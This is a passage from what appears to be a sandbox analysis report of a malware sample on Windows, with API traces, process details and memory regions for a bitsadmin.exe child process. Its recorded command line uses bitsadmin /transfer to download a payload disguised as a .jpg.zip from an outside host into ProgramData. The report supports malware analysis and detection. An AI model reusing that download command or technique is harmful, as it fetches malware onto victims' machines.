[0062.779] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0062.779] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef68 | out: lpConsoleScreenBufferInfo=0x14ef68) returned 1
[0062.779] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x14ef80, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef80*=0xa) returned 1
[0062.780] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0062.780] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef64 | out: lpConsoleScreenBufferInfo=0x14ef64) returned 1
[0062.780] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x14ef7c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef7c*=0x5) returned 1
[0062.780] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0062.780] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef6c | out: lpConsoleScreenBufferInfo=0x14ef6c) returned 1
[0062.780] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x14ef84, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef84*=0x7) returned 1
[0062.781] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0062.781] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef60 | out: lpConsoleScreenBufferInfo=0x14ef60) returned 1
[0062.781] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef78*=0x8) returned 1
[0062.781] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0062.781] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef68 | out: lpConsoleScreenBufferInfo=0x14ef68) returned 1
[0062.781] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef80, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef80*=0x8) returned 1
[0062.782] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0062.782] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef5c | out: lpConsoleScreenBufferInfo=0x14ef5c) returned 1
[0062.782] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x14ef74, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef74*=0xe) returned 1
[0062.782] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0062.782] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef6c | out: lpConsoleScreenBufferInfo=0x14ef6c) returned 1
[0062.783] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x14ef84, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef84*=0xa) returned 1
[0062.783] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0062.783] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef54 | out: lpConsoleScreenBufferInfo=0x14ef54) returned 1
[0062.783] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x14ef6c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef6c*=0xa) returned 1
[0062.784] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0062.784] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef5c | out: lpConsoleScreenBufferInfo=0x14ef5c) returned 1
[0062.784] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef74, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef74*=0x8) returned 1
[0062.784] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0062.785] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14ef80 | out: _Buffer="0") returned 1
[0062.785] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14ef8c | out: _Buffer="1") returned 1
[0062.785] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef5c | out: lpConsoleScreenBufferInfo=0x14ef5c) returned 1
[0062.785] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x14ef74, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef74*=0x5) returned 1
[0062.785] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0062.785] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef64 | out: lpConsoleScreenBufferInfo=0x14ef64) returned 1
[0062.786] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef7c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef7c*=0x8) returned 1
[0062.786] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0062.786] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14ef88 | out: _Buffer="61902") returned 5
[0062.786] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14ef8c | out: _Buffer="112848") returned 6
[0062.786] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14ef88 | out: _Buffer="54") returned 2
[0062.786] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14ef74 | out: lpSystemTimeAsFileTime=0x14ef74*(dwLowDateTime=0xd617a830, dwHighDateTime=0x1d469c7))
[0062.786] _finite (_X=0xc9088cd0) returned 1
[0062.786] _finite (_X=0x731f95c4) returned 1
[0062.786] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef34 | out: lpConsoleScreenBufferInfo=0x14ef34) returned 1
[0062.787] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x14ef4c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef4c*=0x16) returned 1
[0062.787] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0062.787] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef40 | out: lpConsoleScreenBufferInfo=0x14ef40) returned 1
[0062.787] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x14ef58, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef58*=0xf) returned 1
[0062.787] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0062.788] _vsnwprintf (in: _Buffer=0x14ed6c, _BufferCount=0xfe, _Format="%.2f KB/S", _ArgList=0x14ed30 | out: _Buffer="82.20 KB/S") returned 10
[0062.788] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef38 | out: lpConsoleScreenBufferInfo=0x14ef38) returned 1
[0062.788] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x14ef50, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef50*=0xb) returned 1
[0062.788] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0062.788] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef40 | out: lpConsoleScreenBufferInfo=0x14ef40) returned 1
[0062.789] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x14ef58, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef58*=0x10) returned 1
[0062.789] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0062.789] _vsnwprintf (in: _Buffer=0x14ed6c, _BufferCount=0xfe, _Format="%I64u Seconds", _ArgList=0x14ed24 | out: _Buffer="1 Seconds") returned 9
[0062.789] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ef84 | out: lpConsoleScreenBufferInfo=0x14ef84) returned 1
[0062.789] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x9, lpNumberOfCharsWritten=0x14ef9c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14ef9c*=0x9) returned 1
[0062.790] CoTaskMemFree (pv=0x2e83c0)
[0062.790] PeekMessageW (in: lpMsg=0x14f8f8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14f8f8) returned 0
[0062.790] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x14f920*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0063.105] PeekMessageW (in: lpMsg=0x14f8f8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14f8f8) returned 1
[0063.105] TranslateMessage (lpMsg=0x14f8f8) returned 0
[0063.105] DispatchMessageW (lpMsg=0x14f8f8) returned 0x1
[0063.105] IBackgroundCopyCallback:JobTransferred (This=0x2f0e78, pJob=0x2da6a4) returned 0x0
[0063.105] IBackgroundCopyJob:GetState (in: This=0x2da614, pVal=0x2f0e84 | out: pVal=0x2f0e84) returned 0x0
[0063.106] IBackgroundCopyCallback:JobModification (This=0x2f0e78, pJob=0x2da6a4, dwReserved=0x0) returned 0x0
[0063.106] IBackgroundCopyJob:GetState (in: This=0x2da614, pVal=0x2f0e84 | out: pVal=0x2f0e84) returned 0x0
[0063.107] IBackgroundCopyJob:GetType (in: This=0x2da614, pVal=0x14df30 | out: pVal=0x14df30) returned 0x0
[0063.108] IBackgroundCopyJob:GetProgress (in: This=0x2da614, pVal=0x2f0e88 | out: pVal=0x2f0e88) returned 0x0
[0063.109] IBackgroundCopyJob:GetPriority (in: This=0x2da614, pVal=0x14df2c | out: pVal=0x14df2c) returned 0x0
[0063.109] CoTaskMemFree (pv=0x0)
[0063.109] IBackgroundCopyJob:GetDisplayName (in: This=0x2da614, pVal=0x14df44 | out: pVal=0x14df44*="msd5") returned 0x0
[0063.110] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14deec | out: lpConsoleScreenBufferInfo=0x14deec) returned 1
[0063.110] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x14df04 | out: lpNumberOfCharsWritten=0x14df04) returned 1
[0063.111] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x14df04 | out: lpNumberOfAttrsWritten=0x14df04) returned 1
[0063.111] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0063.111] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.111] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ded8 | out: lpConsoleScreenBufferInfo=0x14ded8) returned 1
[0063.112] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x14def0, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14def0*=0xa) returned 1
[0063.112] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.112] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ded4 | out: lpConsoleScreenBufferInfo=0x14ded4) returned 1
[0063.112] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x14deec, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14deec*=0x5) returned 1
[0063.112] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.113] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14dedc | out: lpConsoleScreenBufferInfo=0x14dedc) returned 1
[0063.113] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x14def4, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14def4*=0x7) returned 1
[0063.113] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.113] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ded0 | out: lpConsoleScreenBufferInfo=0x14ded0) returned 1
[0063.113] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14dee8, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14dee8*=0x8) returned 1
[0063.114] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.114] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ded8 | out: lpConsoleScreenBufferInfo=0x14ded8) returned 1
[0063.114] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14def0, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14def0*=0x8) returned 1
[0063.114] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.115] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14decc | out: lpConsoleScreenBufferInfo=0x14decc) returned 1
[0063.115] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x14dee4, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14dee4*=0xd) returned 1
[0063.115] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.115] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14dedc | out: lpConsoleScreenBufferInfo=0x14dedc) returned 1
[0063.115] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x14def4, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14def4*=0xa) returned 1
[0063.116] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.116] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14dec4 | out: lpConsoleScreenBufferInfo=0x14dec4) returned 1
[0063.116] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x14dedc, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14dedc*=0xa) returned 1
[0063.116] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.116] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14decc | out: lpConsoleScreenBufferInfo=0x14decc) returned 1
[0063.116] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14dee4, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14dee4*=0x8) returned 1
[0063.117] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.117] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14def0 | out: _Buffer="1") returned 1
[0063.117] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14defc | out: _Buffer="1") returned 1
[0063.117] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14decc | out: lpConsoleScreenBufferInfo=0x14decc) returned 1
[0063.117] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x14dee4, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14dee4*=0x5) returned 1
[0063.117] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0063.118] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ded4 | out: lpConsoleScreenBufferInfo=0x14ded4) returned 1
[0063.118] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14deec, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14deec*=0x8) returned 1
[0063.118] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.118] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14def8 | out: _Buffer="112848") returned 6
[0063.118] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14defc | out: _Buffer="112848") returned 6
[0063.118] _vsnwprintf (in: _Buffer=0xd303f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x14def8 | out: _Buffer="100") returned 3
[0063.118] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14def4 | out: lpConsoleScreenBufferInfo=0x14def4) returned 1
[0063.119] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x14df0c, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14df0c*=0x16) returned 1
[0063.119] CoTaskMemFree (pv=0x2e83c0)
[0063.119] IBackgroundCopyJob:Complete (This=0x2da614) returned 0x0
[0063.125] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14def8 | out: lpConsoleScreenBufferInfo=0x14def8) returned 1
[0063.125] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14decc | out: lpConsoleScreenBufferInfo=0x14decc) returned 1
[0063.126] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14dee4, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14dee4*=0x2) returned 1
[0063.126] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14decc | out: lpConsoleScreenBufferInfo=0x14decc) returned 1
[0063.126] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd243c4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x14dee4, lpReserved=0x0 | out: lpBuffer=0xd243c4*, lpNumberOfCharsWritten=0x14dee4*=0x14) returned 1
[0063.126] GetCurrentThreadId () returned 0xaf4
[0063.126] PostThreadMessageW (idThread=0xaf4, Msg=0x401, wParam=0x0, lParam=0x0) returned 1
[0063.127] PeekMessageW (in: lpMsg=0x14f8f8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14f8f8) returned 1
[0063.127] IUnknown:Release (This=0x2da614) returned 0x1
[0063.127] IUnknown:Release (This=0x2da53c) returned 0x0
[0063.127] CoUninitialize ()
[0063.127] IUnknown:Release (This=0x2f0e78) returned 0x2
[0063.128] IUnknown:Release (This=0x2f0e78) returned 0x1
[0063.128] IUnknown:Release (This=0x2f0e78) returned 0x0
[0063.128] IUnknown:Release (This=0x2da614) returned 0x1
[0063.128] CoTaskMemFree (pv=0x2f0e78)
[0063.131] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0063.131] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1
[0063.131] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0063.131] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0063.131] CloseHandle (hObject=0x80) returned 1
[0063.131] exit (_Code=0)
Thread:
id = 95
os_tid = 0xb08
Thread:
id = 96
os_tid = 0xb0c
Thread:
id = 97
os_tid = 0xb10
Thread:
id = 98
os_tid = 0xb14
Process:
id = "8"
image_name = "bitsadmin.exe"
filename = "c:\\windows\\system32\\bitsadmin.exe"
page_root = "0x7f1be220"
os_pid = "0xb74"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\bitsadmin.exe\" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmb.jpg.zip?607484307 C:\\ProgramData\\tempa\\marxvxinhhmb.jpg"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1147
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1148
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1149
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1150
start_va = 0x1d0000
end_va = 0x20ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1151
start_va = 0xee0000
end_va = 0xf23fff
entry_point = 0xee0000
region_type = mapped_file
name = "bitsadmin.exe"
filename = "\\Windows\\System32\\bitsadmin.exe" (normalized: "c:\\windows\\system32\\bitsadmin.exe")
Region:
id = 1152
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1153
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1154
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1155
start_va = 0x7ffd6000
end_va = 0x7ffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd6000"
filename = ""
Region:
id = 1156
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 1157
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1158
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1159
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1160
start_va = 0xc0000
end_va = 0x187fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 1161
start_va = 0x350000
end_va = 0x44ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 1162
start_va = 0x590000
end_va = 0x59ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 1163
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1164
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1165
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1166
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1167
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1168
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1169
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1170
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1171
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1172
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1173
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1174
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1175
start_va = 0x76da0000
